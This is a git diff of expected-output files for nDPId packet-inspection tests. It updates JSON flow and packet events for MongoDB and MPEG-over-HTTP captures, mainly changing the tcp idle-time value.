+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":364,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1483737232974} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":633,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1483814916005} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1483814916108} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 diff --git a/test/results/mpeg.pcap.out b/test/results/mpeg.pcap.out index 490046696..e988c5725 100644 --- a/test/results/mpeg.pcap.out +++ b/test/results/mpeg.pcap.out @@ -1,12 +1,12 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mpeg.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434379491040} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} 